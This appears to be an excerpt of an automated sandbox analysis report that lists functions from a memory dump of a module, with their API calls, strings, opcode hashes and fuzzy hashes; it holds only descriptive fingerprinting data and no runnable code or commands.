Function 6E7E9F89, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: dade2e3216bfaa27f419627fddc866f34a119571d379f6e9ea8bdaab8057ae7a
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 6F91657260D0A30EE79D46BE867443EFFF15A923A130607ADD4F2CA9E5FE24C554DA20

Uniqueness

Uniqueness Score: -1.00%

Function 6E7ED32D, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7db90a071272b603df3c09d6403204539b49b43d3186444bd8089d9070fd1872
Instruction ID: a0797cad12bfeab187611d88cce45d916e64e96842cddfbb86d6b7024a8692b0
Opcode Fuzzy Hash: 7db90a071272b603df3c09d6403204539b49b43d3186444bd8089d9070fd1872
Instruction Fuzzy Hash: 31614AA5240705D6DB5089F88BA57EE73A9DBD3308F00093ADF52DFDF0D621A9428E5E

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E9CDF, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: a2102b7aee463d1d3840d34de62302bd857c3cf38b855ca8b2deb4c408a05e30
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: F2816A7320D0E34DD79E82BE867407EFFF15A622A130947EDE4F2CA9E5EE14D1549A20

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E98C0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: d0221a8b797e6ff42a6199fd0d2f6af2daa6de149b2b69f4e26e9a2b0ad167e7
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 67112B7724018387D78085AFDBB06ABE395FBEE22472943FAD0A14BE7CD123E1459E00

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D8080, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63cd241727f9c0d9023f636bee476899c3ad84106e3150bd46020c8d77d6044a
Instruction ID: cdae11691812dd0fb27c0f0aa56b0b3f08def4c5932a457f1c2fac226f45badb
Opcode Fuzzy Hash: 63cd241727f9c0d9023f636bee476899c3ad84106e3150bd46020c8d77d6044a
Instruction Fuzzy Hash: B3219576A041188FD750CF59D9C0A55BBF4FF4A210B1A51EADD49CB326D231E849CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D1890, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bda7b6c9e26521cec4a06c13cd593b37dadcfbbd5f03b43eccbbdffa3396ce5
Instruction ID: be6243ed88e8ba43d83943c9240ad7feddac204c02d6c739347e9ebe8508d3f3
Opcode Fuzzy Hash: 2bda7b6c9e26521cec4a06c13cd593b37dadcfbbd5f03b43eccbbdffa3396ce5
Instruction Fuzzy Hash: 6DF01C35704A459FD704CF94C954B65B7E9FB09B20F1086ADE81ACBBA0EB35A808CA90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D6320, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b5981a7cfa12a90d6dacec9a1ea9faca388e5f667b79ceaea35c536865e24c
Instruction ID: be3ef99136faa0f615e9569512827e685b2fef49cac0f6222abf46026f6ce99c
Opcode Fuzzy Hash: 78b5981a7cfa12a90d6dacec9a1ea9faca388e5f667b79ceaea35c536865e24c
Instruction Fuzzy Hash: AFE0E6356266618FDB99CB89E950A59F3A0EF40720B0604B5D855CB625C360EA4589D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D91D0, Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 424memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6E7D930A
VariantCopy.OLEAUT32(?,?), ref: 6E7D9318
SysFreeString.OLEAUT32(00000000), ref: 6E7D9360
SysFreeString.OLEAUT32(-00000001), ref: 6E7D93F2
VariantClear.OLEAUT32(?), ref: 6E7D9427
SysFreeString.OLEAUT32(-00000001), ref: 6E7D9446
SysFreeString.OLEAUT32(00000000), ref: 6E7D9477
SysFreeString.OLEAUT32(00000000), ref: 6E7D9490
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E7D9514
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E7D951E
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E7D953B
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E7D9558
SysFreeString.OLEAUT32(00000000), ref: 6E7D9567
SysFreeString.OLEAUT32(00000000), ref: 6E7D95EB
SysFreeString.OLEAUT32(00000000), ref: 6E7D962F
_com_issue_error.COMSUPP ref: 6E7D9671
_com_issue_error.COMSUPP ref: 6E7D967B
_com_issue_error.COMSUPP ref: 6E7D9681
_com_issue_error.COMSUPP ref: 6E7D968B
SysFreeString.OLEAUT32(76E3D5B0), ref: 6E7D9691

Strings

lines, xrefs: 6E7D950B, 6E7D9532
offsetY, xrefs: 6E7D9326
!, xrefs: 6E7D963A

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$_com_issue_error$Variant$ByteCharMultiWide$AllocBstrClearCopyInit
String ID: !$lines$offsetY
API String ID: 2214081791-1236976741
Opcode ID: 548d7bb5730366af8bfd7bdfaab3a1c6942183e297dc4e24f65d37c0b5700fb7
Instruction ID: e86cdd98e1af2e988fcf56a73fa7733b4404b19ed962227aee7206c5cce496cc
Opcode Fuzzy Hash: 548d7bb5730366af8bfd7bdfaab3a1c6942183e297dc4e24f65d37c0b5700fb7
Instruction Fuzzy Hash: F6F18F70A0064A9FEF01DFE4CA68BEEBBB8AF15704F104568E415FB2A4D775D909CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E1A20, Relevance: 31.7, APIs: 21, Instructions: 183windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6E7E1AD3
GetParent.USER32(?), ref: 6E7E1ADC
GetClientRect.USER32 ref: 6E7E1AF2
CreateCompatibleDC.GDI32(?), ref: 6E7E1AF8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E7E1B1A
SelectObject.GDI32(00000000,00000000), ref: 6E7E1B26
SelectObject.GDI32(00000000,?), ref: 6E7E1B38
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E7E1B51
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E7E1B5F
SetBkMode.GDI32(?,00000001), ref: 6E7E1B68
SetTextColor.GDI32(?,00FFFFFF), ref: 6E7E1B74
GetClientRect.USER32 ref: 6E7E1B86
ClientToScreen.USER32(?,?), ref: 6E7E1B94
ClientToScreen.USER32(?,?), ref: 6E7E1BA9
ClientToScreen.USER32(?,?), ref: 6E7E1BCB
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E7E1C2D
SelectObject.GDI32(?,?), ref: 6E7E1C38
SelectObject.GDI32(?,?), ref: 6E7E1C43
DeleteObject.GDI32(?), ref: 6E7E1C4D
DeleteDC.GDI32(?), ref: 6E7E1C54
EndPaint.USER32(?,?), ref: 6E7E1C62

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 96dc87c2a5a5934464dc57c040b75ae7bb99441c166b8d8b1a1c7a881b5a83ac
Instruction ID: 4f95ff430568dfad620eff2b634d27bf411a0258755bd623186515b372323ac5
Opcode Fuzzy Hash: 96dc87c2a5a5934464dc57c040b75ae7bb99441c166b8d8b1a1c7a881b5a83ac
Instruction Fuzzy Hash: 3A615C71108B05AFDB209F64CD09B6FBBE9FF89700F004A1CF699921A0DB35A905CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E1A90, Relevance: 31.6, APIs: 21, Instructions: 141windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6E7E1AD3
GetParent.USER32(?), ref: 6E7E1ADC
GetClientRect.USER32 ref: 6E7E1AF2
CreateCompatibleDC.GDI32(?), ref: 6E7E1AF8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E7E1B1A
SelectObject.GDI32(00000000,00000000), ref: 6E7E1B26
SelectObject.GDI32(00000000,?), ref: 6E7E1B38
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E7E1B51
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E7E1B5F
SetBkMode.GDI32(?,00000001), ref: 6E7E1B68
SetTextColor.GDI32(?,00FFFFFF), ref: 6E7E1B74
GetClientRect.USER32 ref: 6E7E1B86
ClientToScreen.USER32(?,?), ref: 6E7E1B94
ClientToScreen.USER32(?,?), ref: 6E7E1BA9
ClientToScreen.USER32(?,?), ref: 6E7E1BCB
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E7E1C2D
SelectObject.GDI32(?,?), ref: 6E7E1C38
SelectObject.GDI32(?,?), ref: 6E7E1C43
DeleteObject.GDI32(?), ref: 6E7E1C4D
DeleteDC.GDI32(?), ref: 6E7E1C54
EndPaint.USER32(?,?), ref: 6E7E1C62

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 47080c9bdeddf07454f412469e1aa706c022d1a4841795cd6ea94a498a433cf5
Instruction ID: 1665b87b116844f5c16bab9160d6e60539c4041ee1ce753afde8de62d62a0224
Opcode Fuzzy Hash: 47080c9bdeddf07454f412469e1aa706c022d1a4841795cd6ea94a498a433cf5
Instruction Fuzzy Hash: 74510572109B45AFDB219F64C908F6FBBE9FF89700F00495DF699921A0DB31A905CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5990, Relevance: 22.9, APIs: 15, Instructions: 351threadwindowmemoryCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 6E7D5A26
GetCurrentThreadId.KERNEL32 ref: 6E7D5A53
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E7D5A64
TlsAlloc.KERNEL32(00000066,?,00000000), ref: 6E7D5A7A
GetCommandLineW.KERNEL32(0000005C,00000058,?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000), ref: 6E7D5B02
GetTickCount.KERNEL32 ref: 6E7D5B08
GetSystemDefaultLangID.KERNEL32(?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000,?,-00000009), ref: 6E7D5B22
GetThreadLocale.KERNEL32(?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000,?,-00000009), ref: 6E7D5B60
GetCurrentThread.KERNEL32 ref: 6E7D5C14
CreateMenu.USER32(?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000,?,-00000009), ref: 6E7D5C31
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E7D5C5D
GetKBCodePage.USER32(00000000,?,-00000009,?,00000066,?,00000000), ref: 6E7D5D40
GetCurrentProcessorNumber.KERNEL32(00000000,?,-00000009,?,00000066,?,00000000), ref: 6E7D5E13
CreateMenu.USER32(?,-00000009,?,00000066,?,00000000), ref: 6E7D5E23
GetSystemDefaultUILanguage.KERNEL32(0000005C,00000058,?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000), ref: 6E7D5E63

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentThread$CreateDefaultMenuSystemUnothrow_t@std@@@__ehfuncinfo$??2@$AllocCodeCommandCountLangLanguageLineLocaleNumberPageProcessorTick
String ID:
API String ID: 3782027070-0
Opcode ID: 0d0c39e9310cace86cb3f1892716c146b5c431fa53713329264eaa2c247ce7c7
Instruction ID: 111c135121c824784af689658cac0d662ebe5c03d118d1edcb818523605de28b
Opcode Fuzzy Hash: 0d0c39e9310cace86cb3f1892716c146b5c431fa53713329264eaa2c247ce7c7
Instruction Fuzzy Hash: 19C13C30D18B05CFD302DFB5954529EB7AAEFDB384F189F2AF445B6071EB2494C98A81

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F723C, Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E7F72AC
_free.LIBCMT ref: 6E7F72C2
_free.LIBCMT ref: 6E7F72D3
_free.LIBCMT ref: 6E7F72E4
_free.LIBCMT ref: 6E7F72FB
GetCPInfo.KERNEL32(?,?), ref: 6E7F7343

Part of subcall function 6E7FE84B: _free.LIBCMT ref: 6E7FE8B6

_free.LIBCMT ref: 6E7F74EF
_free.LIBCMT ref: 6E7F7502
_free.LIBCMT ref: 6E7F7510
_free.LIBCMT ref: 6E7F751B
_free.LIBCMT ref: 6E7F755D
_free.LIBCMT ref: 6E7F7565
_free.LIBCMT ref: 6E7F756D
_free.LIBCMT ref: 6E7F7575
_free.LIBCMT ref: 6E7F7583

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 2ceabc219267171051859c37872dfe166540daf3762f403d4b4f28a1f4e704f5
Instruction ID: 7f5017eff6657d10b680821770959605d307c2202e358bc7e38a7b84a1c49fc1
Opcode Fuzzy Hash: 2ceabc219267171051859c37872dfe166540daf3762f403d4b4f28a1f4e704f5
Instruction Fuzzy Hash: 43B19E71910206EFDB11CFE8C980BEEBBB8FF08304F504569E859A73A1DB759846DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D96B0, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 287memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,972AE1C9,76E3D5B0,00000000), ref: 6E7D9754
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E7D9762
MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,972AE1C9,76E3D5B0,00000000), ref: 6E7D977F
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E7D97A0
SysFreeString.OLEAUT32(00000000), ref: 6E7D97AF
SysFreeString.OLEAUT32(00000000), ref: 6E7D9936
SysFreeString.OLEAUT32(00000000), ref: 6E7D9988
_com_issue_error.COMSUPP ref: 6E7D9996
SysFreeString.OLEAUT32(76E3D5B0), ref: 6E7D999C

Strings

Arial, xrefs: 6E7D97C5
line, xrefs: 6E7D974B, 6E7D9776
8, xrefs: 6E7D985F

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr_com_issue_error
String ID: 8$Arial$line
API String ID: 4202715868-2849647811
Opcode ID: 3224b4f4f03c361b8676039314ecd49a7c38f4a46abc94715250fac36b9a047f
Instruction ID: 60b149f24396a0d1e72d01c19e91ad9cdd3dc2c4d1842a8facf73c850da8eab2
Opcode Fuzzy Hash: 3224b4f4f03c361b8676039314ecd49a7c38f4a46abc94715250fac36b9a047f
Instruction Fuzzy Hash: 85A1E930900249DFDB10CFE4CA58BEEBBB9EF99314F10455CE455AB3A0DB749A09CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E802374, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E8023B8

Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803BAB
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803BBD
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803BCF
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803BE1
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803BF3
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C05
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C17
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C29
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C3B
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C4D
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C5F
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C71
Part of subcall function 6E803B8E: _free.LIBCMT ref: 6E803C83

_free.LIBCMT ref: 6E8023AD

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

_free.LIBCMT ref: 6E8023CF
_free.LIBCMT ref: 6E8023E4
_free.LIBCMT ref: 6E8023EF
_free.LIBCMT ref: 6E802411
_free.LIBCMT ref: 6E802424
_free.LIBCMT ref: 6E802432
_free.LIBCMT ref: 6E80243D
_free.LIBCMT ref: 6E802475
_free.LIBCMT ref: 6E80247C
_free.LIBCMT ref: 6E802499
_free.LIBCMT ref: 6E8024B1

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: cdca83b266b0b7807d833ab787e42ef9e089152c0f84775968ef08c96b7cca1d
Instruction ID: 3abc44488af1c0b75189689d50382a936ac0b64b050c3096c20c32a11d5117bf
Opcode Fuzzy Hash: cdca83b266b0b7807d833ab787e42ef9e089152c0f84775968ef08c96b7cca1d
Instruction Fuzzy Hash: 5E315931608605DFEB649EE9DE44B8A73ACAF10224F114D19E468D76A1DBB9A880CB10

Uniqueness

Uniqueness Score: -1.00%

Function 6E803C8C, Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E803CD4
_free.LIBCMT ref: 6E803CF8
_free.LIBCMT ref: 6E803D05
_free.LIBCMT ref: 6E803D2A
_free.LIBCMT ref: 6E803D37
_free.LIBCMT ref: 6E803D40
_free.LIBCMT ref: 6E80401E
_free.LIBCMT ref: 6E804026

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bea3ce1a3b3d6622f6791f69c147fe8d9ccb20c988aebee5547a08a94155c136
Instruction ID: 286831fff4c4666d5186f0026eff7cf8d860ada84fc175197d7f623fa360b865
Opcode Fuzzy Hash: bea3ce1a3b3d6622f6791f69c147fe8d9ccb20c988aebee5547a08a94155c136
Instruction Fuzzy Hash: 17C13EB2944209EFDB60DFE8CD86FDA77BCEB09714F150565FA04FB281D67099418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5ED0, Relevance: 18.3, APIs: 12, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(00000030,?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9,00002710,00000000), ref: 6E7D5EE5

Part of subcall function 6E7D5990: GetCurrentThread.KERNEL32 ref: 6E7D5A26
Part of subcall function 6E7D5990: GetCurrentThreadId.KERNEL32 ref: 6E7D5A53
Part of subcall function 6E7D5990: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E7D5A64
Part of subcall function 6E7D5990: TlsAlloc.KERNEL32(00000066,?,00000000), ref: 6E7D5A7A
Part of subcall function 6E7D5990: GetCommandLineW.KERNEL32(0000005C,00000058,?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000), ref: 6E7D5B02
Part of subcall function 6E7D5990: GetTickCount.KERNEL32 ref: 6E7D5B08

Part of subcall function 6E7D5ED0: GetCommandLineW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9,00002710,00000000), ref: 6E7D5F6D
Part of subcall function 6E7D5ED0: GetTickCount.KERNEL32 ref: 6E7D5F73
Part of subcall function 6E7D5ED0: GetSystemDefaultLangID.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9,00002710,00000000), ref: 6E7D5F8D
Part of subcall function 6E7D5ED0: GetThreadLocale.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9,00002710,00000000), ref: 6E7D5FD1
Part of subcall function 6E7D5ED0: GetCurrentThread.KERNEL32 ref: 6E7D6081
Part of subcall function 6E7D5ED0: CreateMenu.USER32(?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9,00002710,00000000), ref: 6E7D609E

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E7D60D0
GetKBCodePage.USER32(00000000,?,-00000009,?,00000030,?,00000000,?,?,?,?,?,?,?,?,6E7D7FC9), ref: 6E7D61C0

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Current$AllocCommandCountLineTickUnothrow_t@std@@@__ehfuncinfo$??2@$CodeCreateDefaultLangLocaleMenuPageSystem
String ID:
API String ID: 1206515349-0
Opcode ID: ed43db878ee37f3658c5d1c945ff55ed56041cbff298d5ba8890c798c2f1cd3f
Instruction ID: 98f552c38b42ce7757be71f1e5f631610c517cf5bbff642133f93c1ff24ffd35
Opcode Fuzzy Hash: ed43db878ee37f3658c5d1c945ff55ed56041cbff298d5ba8890c798c2f1cd3f
Instruction Fuzzy Hash: 6DA10A30D14F098FC302DFB5995529FF3A9AFDB384F148F2AF445B6061EB2455D98A81

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D53C0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6E7D53FE
__Getcvt.LIBCPMT ref: 6E7D5423

Strings

true, xrefs: 6E7D54B9
false, xrefs: 6E7D5480
Unknown exception, xrefs: 6E7D544C

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
